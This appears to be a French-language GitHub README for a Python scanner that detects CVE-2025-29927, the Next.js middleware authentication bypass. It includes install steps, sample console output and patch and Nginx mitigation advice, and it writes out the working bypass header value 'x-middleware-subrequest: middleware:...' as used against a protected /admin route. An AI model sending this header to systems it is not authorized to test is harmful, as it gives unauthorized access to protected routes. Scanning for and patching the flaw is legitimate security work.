
🔐 Scanner intelligent basé sur Python pour CVE-2025-29927 — vulnérabilité de contournement de l'authentification du middleware Next.js. Détecte les meta refresh, les redirections basées sur des mots-clés, et plus encore.
Ce scanner intelligent basé sur Python permet de détecter la vulnérabilité CVE-2025-29927 dans les applications Next.js — un contournement critique du middleware qui permet aux attaquants de sauter l'authentification en utilisant un en-tête HTTP spécialement conçu.
🧠 L'outil identifie non seulement les redirections HTTP mais aussi les mécanismes de redirection côté client tels que
<meta http-equiv="refresh">, les redirections basées sur des mots-clés de connexion, et les contournements silencieux d'authentification.
x-middleware-subrequest<meta refresh>login, sign in, authentication$ python3 CVE-2025-29927.py
🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin
→ Testing with header: middleware:middleware:middleware:middleware:middleware
↳ HTTP Status: 200
↳ Redirect detected: No
✅ VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Main interactive scanner
├── requirements.txt # Python dependencies
└── README.md # This file
requests
beautifulsoup4
colorama
Si votre application est affectée, procédez comme suit :
v15.2.3 ou supérieure (ou 14.2.25+ / 13.5.7+)x-middleware-subrequest à la périphérie (par exemple Nginx) :proxy_set_header x-middleware-subrequest "";
CVE-2025-29927 permet aux attaquants de contourner les vérifications du middleware Next.js en manipulant l'en-tête x-middleware-subrequest avec des valeurs spécialement conçues telles que :
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
Dans les versions vulnérables, cela désactive complètement l'exécution du middleware — permettant un accès direct à des routes protégées comme /dashboard, /admin, etc.
Maintenu par : @mrzblackhat
N'hésitez pas à me contacter sur Telegram pour des suggestions, améliorations ou contributions.
next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking
Cet outil est fourni à des fins éducatives et de recherche uniquement. Utilisez-le de manière responsable.